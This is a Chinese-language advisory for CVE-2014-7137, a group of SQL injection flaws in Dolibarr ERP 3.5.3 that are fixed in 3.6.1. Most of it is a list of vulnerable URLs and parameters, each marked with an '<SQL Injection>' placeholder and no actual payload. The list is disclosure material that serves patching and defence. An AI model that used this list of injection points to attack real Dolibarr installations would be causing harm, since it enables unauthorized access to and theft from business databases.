Dolibarr多个SQL注入漏洞(CVE

发布日期:2014-11-19
更新日期:2014-11-21

受影响系统:
Dolibarr Dolibarr ERP 3.5.3
不受影响系统:
Dolibarr Dolibarr ERP 3.6.1
描述:
BUGTRAQ  ID: 71189
 CVE(CAN) ID: CVE-2014-7137

Dolibarr ERP/CRM是管理公司业务信息的软件。

Dolibarr 3.5.3及其他版本在实现上存在多个SQL注入漏洞,攻击者可利用此漏洞执行未授权数据库操作。

<*来源:Jerzy Kramarz
 
  链接:
 *>

测试方法:

警 告

以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
[IP]/dolibarr/product/stock/fiche.php?action=edit&id=1<SQL Injection>

[IP]/dolibarr/product/stock/liste.php?sref=55<SQL Injection>&token=142abe4c1c4b84c3d0c81533c3840cc4&sall=55

[IP]/dolibarr/product/stock/liste.php?sref=555-555-0199 (at) example (dot) c [email concealed]
 om&token=142abe4c1c4b84c3d0c81533c3840cc4&sall=55<SQL Injection>

[IP]/dolibarr/projet/element.php?ref=PJ1407<SQL Injection>

[IP]/dolibarr/projet/tasks/index.php?search_project=5<SQL Injection>bqve&button_search.x=1&button_search.y=1&mode=

[IP]/dolibarr/compta/prelevement/demandes.php?search_societe=5<SQ
 L Injection>&search_facture=5&button_search.x=1&button_search.y=1

[IP]/dolibarr/comm/mailing/liste.php?sref=5<SQL Injection>&sall=5&x=1&y=1

[IP]/dolibarr/comm/mailing/liste.php?sref=5&sall=5<SQL Injection>&x=1&y=1

[IP]/dolibarr/compta/sociales/index.php?search_label=5<SQL Injection>&button_search.x=1&button_search.y=1

[IP]/dolibarr/compta/paiement/cheque/liste.php?sortfield=bc.numbe
 r<SQL Injection>&sortorder=asc&begin=&

[IP]/dolibarr/compta/paiement/cheque/liste.php?sortfield=bc.numbe
 r&sortorder=asc<SQL Injection>&begin=&

[IP]/dolibarr/compta/prelevement/rejets.php?sortfield=p.ref<SQL Injection>&sortorder=asc&begin=&

[IP]/dolibarr/compta/prelevement/rejets.php?sortfield=p.ref&sorto
 rder=asc<SQL Injection>&begin=&

[IP]/dolibarr/product/liste.php?sortfield=p.ref&sortorder=asc&beg
 in=&sref=&snom=&sall=&tosell=<SQL Injection>&tobuy=&type=&

[IP]/dolibarr/product/liste.php?sortfield=p.ref&sortorder=asc&beg
 in=&sref=&snom=&sall=&tosell=&tobuy=<SQL Injection>&type=&

[IP]/dolibarr/product/reassort.php?toolowstock=on&snom=5&sortorde
 r=ASC&sref=5&token=d638ca7f80a7ad68e2cf327a75f954a6&button_search.x=1&bu
 tton_search.y=1&type=&search_categ=4<SQL Injection>&sortfield=stock_physique

[IP]/dolibarr/product/liste.php?sortfield=p.ref&sortorder=asc&beg
 in=&sref=&snom=&sall=&tosell=1<SQL Injection>&tobuy=&type=&

[IP]/dolibarr/product/liste.php?sortfield=p.ref&sortorder=asc&beg
 in=&sref=&snom=&sall=&tosell=1&tobuy=<SQL Injection>&type=&

[IP]/dolibarr/product/stats/commande_fournisseur.php?sortfield=c.
 rowid<SQL Injection>&sortorder=asc&begin=&id=2

[IP]/dolibarr/product/stats/commande_fournisseur.php?sortfield=c.
 rowid&sortorder=asc<SQL Injection>&begin=&id=2

[IP]/dolibarr/product/stats/contrat.php?sortfield=c.rowid<SQL Injection>&sortorder=asc&begin=&id=2

[IP]/dolibarr/product/stats/contrat.php?sortfield=c.rowid'&sortor
 der=asc<SQL Injection>&begin=&id=2

[IP]/dolibarr/product/stats/facture_fournisseur.php?sortfield=s.r
 owid<SQL Injection>&sortorder=asc&begin=&id=2

[IP]/dolibarr/product/stats/facture_fournisseur.php?sortfield=s.r
 owid&sortorder=asc<SQL Injection>&begin=&id=2

[IP]/dolibarr/product/stats/propal.php?sortfield=p.rowid<SQL Injection>&sortorder=asc&begin=&id=2

[IP]/dolibarr/product/stats/propal.php?sortfield=p.rowid&sortorde
 r=asc<SQL Injection>&begin=&id=2

[IP]/dolibarr/product/stock/fiche.php?id=0<SQL Injection>

[IP]/dolibarr/product/stock/info.php?id=0<SQL Injection>

[IP]/dolibarr/product/stock/liste.phpsortfield=e.label&sortorder=
 asc<SQL Injection>&begin=&

[IP]/dolibarr/product/stock/liste.php?sortfield=e.label<SQL Injection>&sortorder=asc&begin=&

[IP]/dolibarr/product/reassort.php?toolowstock=on&snom=5&sortorde
 r=ASC&sref=5<SQL Injection>&token=d638ca7f80a7ad68e2cf327a75f954a6&button_search.x=1&butt
 on_search.y=1&type=&search_categ=4&sortfield=stock_physique

[IP]/dolibarr/product/stock/massstockmove.php?productid=1<SQL Injection>&token=9d491e55462571d39390bd136f4f50da&id_tw=-1&action=addlin
 e&qty=5&id_sw=-1&addline=%D8%B1%D8%AA%D8%AE%D8%A7&search_productid=5

[IP]/dolibarr/product/stock/replenishorders.php?sortfield=cf.ref&
 sortorder=asc<SQL Injection>&begin=&

[IP]/dolibarr/product/stock/replenishorders.php?sortfield=cf.ref<
 SQL Injection>&sortorder=asc&begin=&

[IP]/dolibarr/projet/contact.php?id=1&action=deletecontact&lineid
 =21<SQL Injection>

[IP]/dolibarr/projet/contact.php?id=1&action=swapstatut&ligne=21<
 SQL Injection>

[IP]/dolibarr/projet/tasks/contact.php?id=1&action=swapstatut&lig
 ne=21<SQL Injection>

[IP]/dolibarr/compta/recap-compta.php?socid=1<SQL Injection>

[IP]/dolibarr/holiday/index.php?mainmenu=holiday&id=1<SQL Injection>

内容版权声明:除非注明,否则皆为本站原创文章。

转载注明出处:http://www.heiqu.com/899ac50714c110d78f1fc88c3dbf98cc.html